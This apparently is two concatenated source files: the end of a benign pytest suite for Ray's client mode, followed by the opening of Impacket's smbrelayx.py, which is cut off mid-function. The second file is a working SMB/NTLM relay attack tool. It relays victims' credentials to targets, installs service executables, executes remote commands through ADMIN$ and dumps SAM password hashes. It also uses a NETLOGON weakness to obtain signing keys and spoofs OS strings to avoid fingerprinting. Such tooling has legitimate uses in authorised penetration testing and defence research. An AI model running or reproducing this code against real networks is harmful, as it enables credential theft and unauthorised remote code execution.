ray.wait(ClientObjectRef("blabla"))
with pytest.raises(TypeError):
ray.wait(["blabla"])
def test_remote_functions(ray_start_regular_shared):
with ray_start_client_server() as ray:
SignalActor = create_remote_signal_actor(ray)
signaler = SignalActor.remote()
@ray.remote
def plus2(x):
return x + 2
@ray.remote
def fact(x):
print(x, type(fact))
if x <= 0:
return 1
# This hits the "nested tasks" issue
# https://github.com/ray-project/ray/issues/3644
# So we're on the right track!
return ray.get(fact.remote(x - 1)) * x
ref2 = plus2.remote(234)
# `236`
assert ray.get(ref2) == 236
ref3 = fact.remote(20)
# `2432902008176640000`
assert ray.get(ref3) == 2_432_902_008_176_640_000
# Reuse the cached ClientRemoteFunc object
ref4 = fact.remote(5)
assert ray.get(ref4) == 120
# Test ray.wait()
ref5 = fact.remote(10)
# should return ref2, ref3, ref4
res = ray.wait([ref5, ref2, ref3, ref4], num_returns=3)
assert [ref2, ref3, ref4] == res[0]
assert [ref5] == res[1]
assert ray.get(res[0]) == [236, 2_432_902_008_176_640_000, 120]
# should return ref2, ref3, ref4, ref5
res = ray.wait([ref2, ref3, ref4, ref5], num_returns=4)
assert [ref2, ref3, ref4, ref5] == res[0]
assert [] == res[1]
all_vals = ray.get(res[0])
assert all_vals == [236, 2_432_902_008_176_640_000, 120, 3628800]
# Timeout 0 on ray.wait leads to immediate return
# (not indefinite wait for first return as with timeout None):
unready_ref = signaler.wait.remote()
res = ray.wait([unready_ref], timeout=0)
# Not ready.
assert res[0] == [] and len(res[1]) == 1
ray.get(signaler.send.remote())
ready_ref = signaler.wait.remote()
# Ready.
res = ray.wait([ready_ref], timeout=10)
assert len(res[0]) == 1 and res[1] == []
def test_function_calling_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
return "OK"
@ray.remote
def f():
print(f, g)
return ray.get(g.remote())
print(f, type(f))
assert ray.get(f.remote()) == "OK"
def test_basic_actor(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
class HelloActor:
def __init__(self):
self.count = 0
def say_hello(self, whom):
self.count += 1
return "Hello " + whom, self.count
@ray.method(num_returns=2)
def say_hi(self, whom):
self.count += 1
return "Hi " + whom, self.count
actor = HelloActor.remote()
s, count = ray.get(actor.say_hello.remote("you"))
assert s == "Hello you"
assert count == 1
ref = actor.say_hello.remote("world")
s, count = ray.get(ref)
assert s == "Hello world"
assert count == 2
r1, r2 = actor.say_hi.remote("ray")
assert ray.get(r1) == "Hi ray"
assert ray.get(r2) == 3
def test_pass_handles(ray_start_regular_shared):
"""Test that passing client handles to actors and functions to remote actors
in functions (on the server or raylet side) works transparently to the
caller.
"""
with ray_start_client_server() as ray:
@ray.remote
class ExecActor:
def exec(self, f, x):
return ray.get(f.remote(x))
def exec_exec(self, actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def fact(x):
out = 1
while x > 0:
out = out * x
x -= 1
return out
@ray.remote
def func_exec(f, x):
return ray.get(f.remote(x))
@ray.remote
def func_actor_exec(actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def sneaky_func_exec(obj, x):
return ray.get(obj["f"].remote(x))
@ray.remote
def sneaky_actor_exec(obj, x):
return ray.get(obj["actor"].exec.remote(obj["f"], x))
def local_fact(x):
if x <= 0:
return 1
return x * local_fact(x - 1)
assert ray.get(fact.remote(7)) == local_fact(7)
assert ray.get(func_exec.remote(fact, 8)) == local_fact(8)
test_obj = {}
test_obj["f"] = fact
assert ray.get(sneaky_func_exec.remote(test_obj, 5)) == local_fact(5)
actor_handle = ExecActor.remote()
assert ray.get(actor_handle.exec.remote(fact, 7)) == local_fact(7)
assert ray.get(func_actor_exec.remote(actor_handle, fact, 10)) == local_fact(10)
second_actor = ExecActor.remote()
assert ray.get(
actor_handle.exec_exec.remote(second_actor, fact, 9)
) == local_fact(9)
test_actor_obj = {}
test_actor_obj["actor"] = second_actor
test_actor_obj["f"] = fact
assert ray.get(sneaky_actor_exec.remote(test_actor_obj, 4)) == local_fact(4)
def test_basic_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.log = test_log
ray.worker.log_client.set_logstream_level(logging.DEBUG)
# Allow some time to propogate
time.sleep(1)
x = ray.put("Foo")
assert ray.get(x) == "Foo"
time.sleep(1)
logs_with_id = [msg for msg in log_msgs if msg.find(x.id.hex()) >= 0]
assert len(logs_with_id) >= 2, logs_with_id
assert any((msg.find("get") >= 0 for msg in logs_with_id)), logs_with_id
assert any((msg.find("put") >= 0 for msg in logs_with_id)), logs_with_id
def test_stdout_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.stdstream = test_log
@ray.remote
def print_on_stderr_and_stdout(s):
print(s)
print(s, file=sys.stderr)
time.sleep(1)
print_on_stderr_and_stdout.remote("Hello world")
time.sleep(1)
num_hello = 0
for msg in log_msgs:
if "Hello world" in msg:
num_hello += 1
assert num_hello == 2, f"Invalid logs: {log_msgs}"
def test_serializing_exceptions(ray_start_regular_shared):
with ray_start_client_server() as ray:
with pytest.raises(ValueError, match="Failed to look up actor with name 'abc'"):
ray.get_actor("abc")
def test_invalid_task(ray_start_regular_shared):
with ray_start_client_server() as ray:
with pytest.raises(TypeError):
@ray.remote(runtime_env="invalid value")
def f():
return 1
def test_create_remote_before_start(ray_start_regular_shared):
"""Creates remote objects (as though in a library) before
starting the client.
"""
from ray.util.client import ray
@ray.remote
class Returner:
def doit(self):
return "foo"
@ray.remote
def f(x):
return x + 20
# Prints in verbose tests
print("Created remote functions")
with ray_start_client_server() as ray:
assert ray.get(f.remote(3)) == 23
a = Returner.remote()
assert ray.get(a.doit.remote()) == "foo"
def test_basic_named_actor(ray_start_regular_shared):
"""Test that ray.get_actor() can create and return a detached actor."""
with ray_start_client_server() as ray:
@ray.remote
class Accumulator:
def __init__(self):
self.x = 0
def inc(self):
self.x += 1
def get(self):
return self.x
@ray.method(num_returns=2)
def half(self):
return self.x / 2, self.x / 2
# Create the actor
actor = Accumulator.options(name="test_acc").remote()
actor.inc.remote()
actor.inc.remote()
# Make sure the get_actor call works
new_actor = ray.get_actor("test_acc")
new_actor.inc.remote()
assert ray.get(new_actor.get.remote()) == 3
del actor
actor = Accumulator.options(name="test_acc2", lifetime="detached").remote()
actor.inc.remote()
del actor
detatched_actor = ray.get_actor("test_acc2")
for i in range(5):
detatched_actor.inc.remote()
assert ray.get(detatched_actor.get.remote()) == 6
h1, h2 = ray.get(detatched_actor.half.remote())
assert h1 == 3
assert h2 == 3
def test_error_serialization(ray_start_regular_shared):
"""Test that errors will be serialized properly."""
fake_path = os.path.join(os.path.dirname(__file__), "not_a_real_file")
with pytest.raises(FileNotFoundError):
with ray_start_client_server() as ray:
@ray.remote
def g():
with open(fake_path, "r") as f:
f.read()
# Raises a FileNotFoundError
ray.get(g.remote())
def test_internal_kv(ray_start_regular_shared):
with ray_start_client_server() as ray:
assert ray._internal_kv_initialized()
assert not ray._internal_kv_put("apple", "b")
assert ray._internal_kv_put("apple", "asdf")
assert ray._internal_kv_put("apple", "b")
assert ray._internal_kv_get("apple") == b"b"
assert ray._internal_kv_put("apple", "asdf", overwrite=True)
assert ray._internal_kv_get("apple") == b"asdf"
assert ray._internal_kv_list("a") == [b"apple"]
ray._internal_kv_del("apple")
assert ray._internal_kv_get("apple") is None
def test_startup_retry(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
with pytest.raises(ConnectionError):
ray_client.connect("localhost:50051", connection_retries=1)
def run_client():
ray_client.connect("localhost:50051")
ray_client.disconnect()
thread = threading.Thread(target=run_client, daemon=True)
thread.start()
time.sleep(3)
server = ray_client_server.serve("localhost:50051")
thread.join()
server.stop(0)
ray_client._inside_client_test = False
def test_dataclient_server_drop(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
@ray_client.remote
def f(x):
time.sleep(4)
return x
def stop_server(server):
time.sleep(2)
server.stop(0)
server = ray_client_server.serve("localhost:50051")
ray_client.connect("localhost:50051")
thread = threading.Thread(target=stop_server, args=(server,))
thread.start()
x = f.remote(2)
with pytest.raises(ConnectionError):
_ = ray_client.get(x)
thread.join()
ray_client.disconnect()
ray_client._inside_client_test = False
# Wait for f(x) to finish before ray.shutdown() in the fixture
time.sleep(3)
@patch.dict(os.environ, {"RAY_ENABLE_AUTO_CONNECT": "0"})
def test_client_gpu_ids(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with enable_client_mode():
# No client connection.
with pytest.raises(Exception) as e:
ray.get_gpu_ids()
assert (
str(e.value) == "Ray Client is not connected."
" Please connect by calling `ray.init`."
)
with ray_start_client_server():
# Now have a client connection.
assert ray.get_gpu_ids() == []
def test_client_serialize_addon(call_ray_stop_only):
import ray
import pydantic
ray.init(num_cpus=0)
class User(pydantic.BaseModel):
name: str
with ray_start_client_server() as ray:
assert ray.get(ray.put(User(name="ray"))).name == "ray"
object_ref_cleanup_script = """
import ray
ray.init("ray://localhost:50051")
@ray.remote
def f():
return 42
@ray.remote
class SomeClass:
pass
obj_ref = f.remote()
actor_ref = SomeClass.remote()
"""
def test_object_ref_cleanup():
# Checks no error output when running the script in
# object_ref_cleanup_script
# See https://github.com/ray-project/ray/issues/17968 for details
with ray_start_client_server():
result = run_string_as_driver(object_ref_cleanup_script)
assert "Error in sys.excepthook:" not in result
assert "AttributeError: 'NoneType' object has no " not in result
assert "Exception ignored in" not in result
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25552 --port 0"],
indirect=True,
)
def test_wrapped_actor_creation(call_ray_start):
"""
When the client schedules an actor, the server will load a separate
copy of the actor class if it's defined in a separate file. This
means that modifications to the client's copy of the actor class
aren't propagated to the server. Currently, tracing logic modifies
the signatures of actor methods to pass around metadata when ray.remote
is applied to an actor class. However, if a user does something like:
class SomeActor:
def __init__(self):
pass
def decorate_actor():
RemoteActor = ray.remote(SomeActor)
...
Then the SomeActor class will have its signatures modified on the client
side, but not on the server side, since ray.remote was applied inside of
the function instead of directly on the actor. Note if it were directly
applied to the actor then the signature would be modified when the server
imports the class.
"""
import ray
ray.init("ray://localhost:25552")
run_wrapped_actor_creation()
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25553 --num-cpus 0"],
indirect=True,
)
@pytest.mark.parametrize("use_client", [True, False])
def test_init_requires_no_resources(call_ray_start, use_client):
import ray
if use_client:
address = call_ray_start
ray.init(address)
else:
ray.init("ray://localhost:25553")
@ray.remote(num_cpus=0)
def f():
pass
ray.get(f.remote())
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25553 --num-cpus 1"],
indirect=True,
)
def test_object_ref_release(call_ray_start):
import ray
ray.init("ray://localhost:25553")
a = ray.put("Hello")
ray.shutdown()
ray.init("ray://localhost:25553")
del a
with disable_client_hook():
ref_cnt = ray.util.client.ray.get_context().client_worker.reference_count
assert all(v > 0 for v in ref_cnt.values())
def test_empty_objects(ray_start_regular_shared):
"""
Tests that client works with "empty" objects. Sanity check, since put requests
will fail if the serialized version of an object consists of zero bytes.
"""
objects = [0, b"", "", [], np.array(()), {}, set(), None]
with ray_start_client_server() as ray:
for obj in objects:
ref = ray.put(obj)
if isinstance(obj, np.ndarray):
assert np.array_equal(ray.get(ref), obj)
else:
assert ray.get(ref) == obj
def test_large_remote_call(ray_start_regular_shared):
"""
Test remote calls with large (multiple chunk) arguments
"""
with ray_start_client_server() as ray:
@ray.remote
def f(large_obj):
return large_obj.shape
@ray.remote
def f2(*args):
assert args[0] == 123
return args[1].shape
@ray.remote
def f3(*args, **kwargs):
assert args[0] == "a"
assert args[1] == "b"
return kwargs["large_obj"].shape
# 1024x1024x16 f64's =~ 128 MiB. Chunking size is 64 MiB, so guarantees
# that transferring argument requires multiple chunks.
assert OBJECT_TRANSFER_CHUNK_SIZE < 2 ** 20 * 128
large_obj = np.random.random((1024, 1024, 16))
assert ray.get(f.remote(large_obj)) == (1024, 1024, 16)
assert ray.get(f2.remote(123, large_obj)) == (1024, 1024, 16)
assert ray.get(f3.remote("a", "b", large_obj=large_obj)) == (1024, 1024, 16)
@ray.remote
class SomeActor:
def __init__(self, large_obj):
self.inner = large_obj
def some_method(self, large_obj):
return large_obj.shape == self.inner.shape
a = SomeActor.remote(large_obj)
assert ray.get(a.some_method.remote(large_obj))
if __name__ == "__main__":
if os.environ.get("PARALLEL_CI"):
sys.exit(pytest.main(["-n", "auto", "--boxed", "-vs", __file__]))
else:
sys.exit(pytest.main(["-sv", __file__]))
|
smbrelayx.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SMB Relay Module
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc. It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first to try authenticate against the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the smbclient portion. It is supposed to be
# working on any LM Compatibility level. The only way to stop this attack
# is to enforce on the server SPN checks and or signing.
#
# If the target system is enforcing signing and a machine account was provided,
# the module will try to gather the SMB session key through
# NETLOGON (CVE-2015-0005)
#
# If the authentication against the targets succeed, the client authentication
# success as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want to the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
from __future__ import division
from __future__ import print_function
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import http.server
import socketserver
import argparse
import base64
import logging
import os
import sys
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from binascii import unhexlify, hexlify
from struct import pack, unpack
from threading import Thread
from six import PY2
from impacket import version
from impacket.dcerpc.v5 import nrpc
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.examples import logger
from impacket.examples import serviceinstall
from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections, SOCKS
from impacket.examples.ntlmrelayx.clients.smbrelayclient import SMBRelayClient
from impacket.nt_errors import ERROR_MESSAGES
from impacket.nt_errors import STATUS_LOGON_FAILURE, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NOT_SUPPORTED, \
STATUS_MORE_PROCESSING_REQUIRED
from impacket.ntlm import NTLMAuthChallengeResponse, NTLMAuthNegotiate, NTLMAuthChallenge, AV_PAIRS, \
NTLMSSP_AV_HOSTNAME, generateEncryptedSessionKey
from impacket.smb import NewSMBPacket, SMBCommand, SMB, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Extended_Data, \
SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Extended_Response_Data, \
SMBSessionSetupAndX_Parameters, SMBSessionSetupAndX_Extended_Parameters, TypesMech, \
SMBSessionSetupAndXResponse_Parameters, SMBSessionSetupAndXResponse_Data
from impacket.smb3 import SMB3
from impacket.smbconnection import SMBConnection
from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile, SMBSERVER
from impacket.spnego import ASN1_AID, SPNEGO_NegTokenResp, SPNEGO_NegTokenInit
try:
from Cryptodome.Cipher import DES, AES, ARC4
except Exception:
logging.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
logging.critical("See https://pypi.org/project/pycryptodomex/")
# Global Variables
# This is the list of hosts that have been attacked already in case -one-shot was chosen
ATTACKED_HOSTS = set()
CODEC = sys.getdefaultencoding()
class doAttack(Thread):
def __init__(self, SMBClient, exeFile, command, raw):
Thread.__init__(self)
if isinstance(SMBClient, SMB) or isinstance(SMBClient, SMB3):
self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
else:
self.__SMBConnection = SMBClient
self.__exeFile = exeFile
self.__command = command
self.__raw = raw
self.__answerTMP = b''
if exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
global ATTACKED_HOSTS
if self.__exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception as e:
logging.debug('Exception:', exc_info=True)
# Something wen't wrong, most probably we don't have access as admin. aborting
logging.error(str(e))
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
return
try:
if self.__command is not None:
if self.__raw:
remoteOps._RemoteOperations__executeRemoteRaw(self.__command)
else:
remoteOps._RemoteOperations__executeRemote(self.__command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
if not self.__raw:
self.__answerTMP = b''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
logging.debug('Raw answer %r' % self.__answerTMP)
try:
print(self.__answerTMP.decode(CODEC))
except UnicodeDecodeError:
logging.error('Decoding error detected, consider running chcp.com at the target,\nmap the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html\nand then execute wmiexec.py '
'again with -codec and the corresponding codec')
print(self.__answerTMP)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.debug('Exception:', exc_info=True)
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
logging.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
try:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.error(str(e))
pass
class SMBClient(SMB):
def __init__(self, remote_name, extended_security = True, sess_port = 445):
self._extendedSecurity = extended_security
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
SMB.__init__(self,remote_name, remote_name, sess_port = sess_port)
def neg_session(self):
neg_sess = SMB.neg_session(self, extended_security = self._extendedSecurity)
return neg_sess
def setUid(self,uid):
self._uid = uid
def login_standard(self, user, domain, ansiPwd, unicodePwd):
smb = NewSMBPacket()
smb['Flags1'] = 8
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Data()
sessionSetup['Parameters']['MaxBuffer'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VCNumber'] = os.getpid()
sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey']
sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd)
sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd)
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE
sessionSetup['Data']['AnsiPwd'] = ansiPwd
sessionSetup['Data']['UnicodePwd'] = unicodePwd
sessionSetup['Data']['Account'] = user
sessionSetup['Data']['PrimaryDomain'] = domain
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except:
logging.error("Error login_standard")
return None, STATUS_LOGON_FAILURE
else:
self._uid = smb['Uid']
return smb, STATUS_SUCCESS
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
if self._SignatureRequired is True:
if self.domainIp is None:
logging.error("Signature is REQUIRED on the other end, attack will not work")
else:
logging.info("Signature is REQUIRED on the other end, using NETLOGON approach")
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
logging.info("Connecting to %s NETLOGON service" % self.domainIp)
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'] )
_, machineAccount = self.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = AV_PAIRS(av_pairs)
serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
except:
logging.debug("Exception:", exc_info=True)
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.machineHashes) > 0:
lmhash, nthash = self.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount,'', domainName, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName+'\x00', '12345678')
serverChallenge = resp['ServerChallenge']
if self.machineHashes == '':
ntHash = None
else:
ntHash = unhexlify(self.machineHashes.split(':')[1])
sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678', serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00',
ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authenticateMessage[
'user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = '\x00'*8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except DCERPCException as e:
logging.debug('Exception:', exc_info=True)
logging.error(str(e))
return e.get_error_code()
logging.info("%s\\%s successfully validated through NETLOGON" % (
domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != '':
signingKey = generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4']['UserSessionKey']
logging.info("SMB Signing key: %s " % hexlify(signingKey))
self.set_session_key(signingKey)
self._SignatureEnabled = True
self._SignSequenceNumber = 2
self.set_flags(flags1 = SMB.FLAGS1_PATHCASELESS, flags2 = SMB.FLAGS2_EXTENDED_SECURITY)
return STATUS_SUCCESS
def sendAuth(self, serverChallenge, authenticateMessageBlob):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
smb['Uid'] = self._uid
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob)
sessionSetup['Data']['SecurityBlob'] = authenticateMessageBlob
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
errorCode = smb['ErrorCode'] << 16
errorCode += smb['_reserved'] << 8
errorCode += smb['ErrorClass']
if errorCode == STATUS_SUCCESS and self._SignatureRequired is True and self.domainIp is not None:
try:
errorCode = self.netlogonSessionKey(serverChallenge, authenticateMessageBlob)
except:
logging.debug('Exception:', exc_info=True)
raise
return smb, errorCode
def sendNegotiate(self, negotiateMessage):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Let's build a NegTokenInit with the NTLMSSP
# TODO: In the future we should be able to choose different providers
blob = SPNEGO_NegTokenInit()
# NTLMSSP
blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
blob['MechToken'] = negotiateMessage
sessionSetup['Parameters']['SecurityBlobLength'] = len(blob)
sessionSetup['Parameters'].getData()
sessionSetup['Data']['SecurityBlob'] = blob.getData()
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except Exception:
logging.error("SessionSetup Error!")
raise
else:
# We will need to use this uid field for all future requests/responses
self._uid = smb['Uid']
# Now we have to extract the blob to continue the auth process
sessionResponse = SMBCommand(smb['Data'][0])
sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2'])
sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
sessionData.fromString(sessionResponse['Data'])
respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])
return respToken['ResponseToken']
class HTTPRelayServer(Thread):
class HTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, server_address, RequestHandlerClass, target, exeFile, command, mode, outputFile,
one_shot, returnStatus=STATUS_SUCCESS, runSocks = False):
self.target = target
self.exeFile = exeFile
self.command = command
self.mode = mode
self.returnStatus = returnStatus
self.outputFile = outputFile
self.one_shot = one_shot
self.runSocks = runSocks
socketserver.TCPServer.__init__(self,server_address, RequestHandlerClass)
class HTTPHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self,request, client_address, server):
self.server = server
self.protocol_version = 'HTTP/1.1'
self.challengeMessage = None
self.target = None
self.client = None
self.machineAccount = None
self.machineHashes = None
self.domainIp = None
global ATTACKED_HOSTS
if self.server.target in ATTACKED_HOSTS and self.server.one_shot:
logging.info(
"HTTPD: Received connection from %s, skipping %s, already attacked" % (
client_address[0], self.server.target))
return
if self.server.target is not None:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], self.server.target))
else:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], client_address[0]))
http.server.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
def handle_one_request(self):
try:
